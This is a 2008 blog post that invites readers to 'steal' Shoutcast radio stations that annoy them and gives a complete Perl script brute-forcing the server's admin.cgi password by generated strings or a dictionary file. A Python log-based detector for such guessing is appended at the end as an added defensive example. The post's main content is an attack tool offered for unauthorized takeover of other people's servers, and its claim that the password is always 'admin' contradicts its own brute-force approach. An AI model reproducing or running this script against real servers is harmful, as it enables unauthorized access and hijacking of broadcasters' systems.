Jorge Esteban's Blog


Is some Shoutcast radio station getting on your nerves? Steal it…
June 5, 2008, 1:29 am
Filed under: Scripts

As the title of the post says, with this Perl script (you need Perl on Linux or ActivePerl on Windows) you can attack Shoutcast servers via brute force. The password on these servers is always “admin”, so it is not that tedious, since it is only a matter of forcing the password, and depending on your connection and your PC it will come out in x amount of time… Besides, you only have to paste it into Notepad and save it with a .pl extension… the same goes for Linux. Only the Perl path in the header needs to be changed.

#!C:\perl\bin
##########################
# Shoutcast admin password bruteforce
#

use IO::Socket;
system (“cls”);
#system (“gcc -o ./bin/hack ./src/hack.c”);
print “\n”;
$host=$ARGV[0];
$port=$ARGV[1];
$brute=$ARGV[2];
if(!$hostname)
{
print “\n”;
print “\t::: Outpost24 Security :::\n”;
print “David Jacoby – dj\@outpost24.com – www.outpost24.com\n\n”;
print “Usage: ./program <hostname> <port> [brute/dict]\n\n\n”;
}
else{};

if ($brute eq “brute”)

{
for $pass (a .. zzzzzzzzzz)
{
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\tAttacking $host using the following password: $pass\n”;
$EOL = “1512″;
$BLANK = $EOL;
$BLANK1 = $EOL;
$remote = IO::Socket::INET->new( Proto => “tcp”,
PeerAddr => $host,
PeerPort => $port,
);
unless ($remote) { die “cannot connect to http daemon on $host” }
$remote->autoflush(1);
print $remote “GET /admin.cgi?pass=$pass HTTP/1.1 $BLANK” .
“Host: pewp.hack.se:8000 $BLANK” .
“User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 $BLANK” .
“Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 $BLANK” .
“Accept-Language: en-us, en;q=0.50 $BLANK” .
“Accept-Encoding: gzip, deflate, compress;q=0.9 $BLANK” .
“Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66 $BLANK” .
“Keep-Alive: 300 $BLANK” .
“Connection: keep-alive $BLANK” .
“Cache-Control: max-age=0 $BLANK” . $BLANK1;
while ( <$remote> )
{
if (/interface/)
{

system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\t\t\t ::: SUCCESS :::\n\n”;
print “\t\t\t\t\t\tHostname: [$host]\n”;
print “\t\t\t\t\t\tPassword: [$pass]\n\n\n”;
exit 0
}
}
close $remote;
};
};

if ($brute eq “dict”)
{
open (InFile, “./dict/dict.txt”) || die;
$count = 0;
while ($pass = <InFile>)

{
chop ($pass);

use IO::Socket;
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\tAttacking $host using the following password: $pass\n”;
$EOL = “1512″;
$BLANK = $EOL;
$BLANK1 = $EOL;
$remote = IO::Socket::INET->new( Proto => “tcp”,
PeerAddr => $host,
PeerPort => $port,
);
unless ($remote) { die “cannot connect to http daemon on $host” }
$remote->autoflush(1);
print $remote “GET /admin.cgi?pass=$pass HTTP/1.1 $BLANK” .
“Host: pewp.hack.se:8000 $BLANK” .
“User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 $BLANK” .
“Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 $BLANK” .
“Accept-Language: en-us, en;q=0.50 $BLANK” .
“Accept-Encoding: gzip, deflate, compress;q=0.9 $BLANK” .
“Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66 $BLANK” .
“Keep-Alive: 300 $BLANK” .
“Connection: keep-alive $BLANK” .
“Cache-Control: max-age=0 $BLANK” . $BLANK1;

while ( <$remote> )
{
if (/interface/)
{
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\t\t\t ::: SUCCESS :::\n\n”;
print “\t\t\t\t\t\tHostname: [$host]\n”;
print “\t\t\t\t\t\tPassword: [$pass]\n\n\n”;
exit 0
}
}

close $remote;

};
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\t\t\t ::: DAMN DAMN! :::\n\n”;
print “\t\t\t\t\t\tHostname: [$host]\n”;
print “\t\t\t\t\t\tPassword: UNABLE TO FIND PASSWORD!\n\n\n”;
exit 0

};
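
Seen from the defending side, the script's brute mode sends one `GET /admin.cgi?pass=…` per guess from a single source, which stands out in access logs. The detector below is an added example, not part of the original post; the combined log format, the reverse proxy in front of the Shoutcast server, the thresholds and the sample lines are assumptions constructed for illustration.

```python
import hashlib
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample (documentation IP ranges, made-up status codes and sizes):
# one source walking a, b, c, ... like the script's brute mode, and one admin
# who repeats a single password.
SAMPLE_LOG = "\n".join(
    [f'198.51.100.7 - - [05/Jun/2008:01:30:{i:02d} +0000] '
     f'"GET /admin.cgi?pass={p} HTTP/1.1" 200 512'
     for i, p in enumerate("abcdefgh")]
    + ['203.0.113.9 - - [05/Jun/2008:01:30:10 +0000] '
       '"GET /admin.cgi?pass=s3cret HTTP/1.1" 200 4096'] * 8
    + ['203.0.113.9 - - [05/Jun/2008:01:31:00 +0000] '
       '"GET /index.html HTTP/1.1" 200 900'])

# Matches only requests for /admin.cgi that carry a pass= parameter.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"GET /admin\.cgi\?(?:[^" ]*&)?pass=(?P<pw>[^&" ]*)[^"]*" \d{3}')


def detect_admin_guessing(log_text, max_distinct=5,
                          window=timedelta(seconds=60)):
    """Return {ip: time of first alert} for sources that submit more than
    max_distinct different pass= values within the sliding window.
    Lines are assumed to be in chronological order."""
    recent = defaultdict(deque)  # ip -> deque of (timestamp, password digest)
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        # Keep a digest only, so the detector never stores submitted passwords.
        digest = hashlib.sha256(m["pw"].encode()).hexdigest()
        q = recent[m["ip"]]
        q.append((ts, digest))
        while q and ts - q[0][0] > window:
            q.popleft()  # drop attempts that fell out of the window
        if len({d for _, d in q}) > max_distinct and m["ip"] not in alerts:
            alerts[m["ip"]] = ts
    return alerts


if __name__ == "__main__":
    for ip, when in detect_admin_guessing(SAMPLE_LOG).items():
        print(f"possible admin.cgi password guessing from {ip} at {when}")
```

An alert like this can drive a rate limit or temporary block at the proxy. Because `pass=` travels in the query string, any access log that records full URLs also records every submitted password and should be handled as sensitive.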

